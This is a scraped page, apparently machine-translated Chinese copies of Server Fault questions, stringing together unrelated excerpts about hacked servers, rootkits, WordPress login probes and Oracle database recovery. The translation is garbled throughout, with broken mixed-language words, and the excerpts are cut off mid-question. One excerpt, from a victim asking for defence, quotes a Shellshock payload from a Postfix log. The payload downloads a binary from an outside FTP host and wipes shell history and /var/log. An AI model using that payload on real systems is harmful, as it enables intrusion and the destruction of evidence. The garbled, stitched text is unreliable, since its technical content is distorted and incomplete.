所以我受到了一个脚本kitte …幸运的是,该框是Ubuntu,并能够取代W /二进制文件从一个可比较的系统, 但是 , 一些我无法删除的文件,我仍然难住这个。 被劫持的文件位于root可写的/_bin目录下。 nathan@db-0:~$ ls -ld !$ ls -ld /_bin drwxr-xr-x 2 root root 4096 Mar 12 18:00 /_bin 好的,这些是目录上的perms,现在是以下文件中的文件: nathan@db-0:~$ ls -l /_bin total 268 -rwxr-xr-x 1 root root 39696 Nov 19 22:25 ls -rwxr-xr-x 1 root root 119800 Mar 31 2012 netstat -rwxr-xr-x 1 root root 101240 Dec 12 […]
监测和禁止网站污损的最佳实践,政策,工具/实用程序是什么?
我有一个build立在一个旧的pigg版本(从2006年)的网站。 该网站托pipe在Dreamhost共享服务器上。 今天早上我发现我的网站的主要数据库被彻底抹去了。 我该如何确认这是黑客还是其他的东西? 我能做些什么来防止它再次发生? 我无法切换到新版本的pligg,因为我对原始版本进行了许多自定义。 任何意见是高度赞赏。
我们的网站服务器最近经常被黑客攻击,我可以保护它
如果我确定匿名尝试破解我的服务器是否有适当的响应? 或者是看看他们正在试图做什么,并确保我们被覆盖了它和类似的攻击? 干杯, 知更鸟
我有一个简单的Apache Web服务器设置和基本的IP表(ufw)为开发服务器。 在我的日志中,我看到这样的行: [Fri May 16 10:10:36.258369 2014] [:error] [pid 15926] [client 69.147.158.130:8396] script '/var/www/html/wp-login.php' not found or unable to stat 我根本没有运行WordPress,而且我意识到这是一个非常小的尝试(有更复杂的攻击Apache)。 不过,我想自动阻止这个IP地址(暂时),而不需要安装IDS / IPS如Snort。 我只是寻找一个简单的方法来阻止试图连接到wp-admin或wp-login的地址。 有没有一个Apache模块可以处理这样的事情?
我的服务器负荷大约在400及以上。 这里是服务器故障问题的链接 我能够看到rm命令和xargs在顶级输出中运行,其中我是唯一的用户login。 我试图杀死这个过程,但没有奏效。 我试图写一个iptables规则,使默认策略,并允许只有我的IP进行通信,但在这之前,iptables丢失。 我再次安装它,但它显示: FATAL:无法加载/lib/modules/2.6.32-5-vserver-amd64/modules.dep:没有这样的文件或目录iptables v1.4.14:无法初始化iptables table`filter':表不存在你需要insmod?)也许iptables或你的内核需要升级。 当我试图closures服务器,我得到消息的时间。 重新启动也不起作用。 一旦加载下来,我执行chrootkit扫描,这里是结果。 它显示了许多缺less的模块和隐藏的文件。 Searching for suspicious files and dirs, it may take a while… The following suspicious files and directories were found: /usr/lib/pymodules/python2.6/.path /usr/lib/pymodules/python2.7/.path /usr/lib/node_modules/npm/.npmignore /usr/lib/node_modules/npm/.travis.yml /usr/lib/node_modules/npm/node_modules/fast-list/.npmignore /usr/lib/node_modules/npm/node_modules/fast-list/.travis.yml /usr/lib/node_modules/npm/node_modules/fstream/.npmignore /usr/lib/node_modules/npm/node_modules/fstream/.travis.yml /usr/lib/node_modules/npm/node_modules/graceful-fs/.npmignore /usr/lib/node_modules/npm/node_modules/lru-cache/.npmignore /usr/lib/node_modules/npm/node_modules/minimatch/.travis.yml /usr/lib/node_modules/npm/node_modules/node-uuid/.npmignore /usr/lib/node_modules/npm/node_modules/nopt/.npmignore /usr/lib/node_modules/npm/node_modules/slide/.npmignore /usr/lib/node_modules/npm/node_modules/tar/.npmignore /usr/lib/node_modules/npm/node_modules/tar/.travis.yml /usr/lib/node_modules/npm/node_modules/.bin /usr/lib/node_modules/npm/test/packages/npm-test-files/.npmignore /usr/lib/node_modules/npm/test/packages/npm-test-ignore/.npmignore /usr/lib/node_modules/npm/node_modules/.bin 检查`lkm'…你有3086进程隐藏readdir命令SIGINVISIBLE崇拜find chkproc:警告:可能的LKM木马安装 我是否需要进一步调查以确认这是一次袭击? […]
昨天我收到一封邮件,发送邮件{@DOMAIN.ORG,邮件被标记为垃圾邮件。 正文包含脚本下载命令,如ftp://ftp.ugotownedz.org/upfile2.sh 来自syslog的行 Aug 14 19:25:00 hoeschen-vserv postfix/smtpd[20965]: connect from pacific1392.us.unmetered.com[209.239.123.82] Aug 14 19:25:01 hoeschen-vserv postfix/smtpd[20965]: 25B9ADC1075: client=pacific1392.us.unmetered.com[209.239.123.82] Aug 14 19:25:02 hoeschen-vserv postfix/cleanup[20969]: 25B9ADC1075: message-id=() { :; }; /bin/bash -c "mkdir /var/.udp; wget ftp://ftp.ugotownedz.org/Xorg -O … -rf /root/.bash_history; rm -rf /var/log/*" 事实上,这个非常简单的未encryption的shell脚本试图build立一个木马。 对我来说,这看起来很肮脏,并没有成功。 但无论如何,有什么我可以做的保护postfix反对这些types的黑客? 从脚本 … echo sshdo.ico >> /tmp/upfile for file in $(cat /tmp/upfile); […]
我想恢复和恢复我的oracle数据库到当前状态。 例如,我在星期天有一个完整的备份,并且从星期天到星期三我有所有的存档日志。 如果我从备份恢复并恢复到新的主机,我的数据库只处于星期天的状态。 我如何才能将所有归档日志应用到星期三状态? 星期天我需要控制文件自动备份还是星期三需要自动备份? 请给我一些步骤来做到这一点。 问候,Sarith
我正在进行迁移,将数据从SQL Server 2000移动到HP Server计算机上的Oracle 11g。 我不知道为什么它很慢,当我从文件xxx.dat中的数据加载到Oracle 11g中的表。 有人帮我解决我的问题吗? 感谢Ung Sopolin